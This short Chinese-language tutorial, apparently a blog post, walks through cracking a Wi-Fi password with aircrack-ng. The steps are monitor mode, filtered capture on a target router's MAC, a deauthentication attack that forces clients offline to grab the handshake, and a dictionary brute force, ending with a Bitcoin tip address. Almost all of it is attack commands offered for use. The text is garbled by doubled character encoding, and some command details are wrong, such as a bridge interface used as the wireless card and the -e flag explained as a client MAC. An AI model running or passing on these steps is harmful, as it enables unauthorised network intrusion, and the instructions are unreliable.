1.查看你的網(wǎng)卡
ifconfig
2.將你的網(wǎng)卡設(shè)置為監(jiān)聽(tīng)模式
airmon-ng start virbr0
3.查看無(wú)線網(wǎng)絡(luò)
airodump-ng mon0
4.通過(guò)過(guò)濾抓包
airodump-ng ?--ivs ?--bssid ?FC:D7:33:3F:BC:F8 ?–w ?longas ?-c ?11 ?mon0
--bssid 是路由器的mac地址
-w 是寫(xiě)入到文件longas中
-c 11 是頻道11
--ivs 是只抓取可用于破解的IVS數(shù)據(jù)報(bào)文
5. 使用攻擊手段使客戶端的無(wú)線網(wǎng)掉線然后可以抓取整個(gè)認(rèn)證包.
aireplay-ng? -0 10? -a? 路由器MAC -e 客戶端MAC? mon0 --ignore-negative-one
-0 ? 攻擊模式 10次
-a AP MAC
-e 客戶端mac
-ignore-negative-one 內(nèi)核支持
6.暴力破解
破解的真正關(guān)建在于字典的強(qiáng)大.
aircrack-ng? -w pass longas-03.ivs
總結(jié): 通過(guò)認(rèn)證抓包,暴力破解密碼.
如果你覺(jué)得文章對(duì)您有幫助就打賞一下吧。
BTC : 18BqdPe7m5XYF8sWGtP3we71dL5BLXY6PU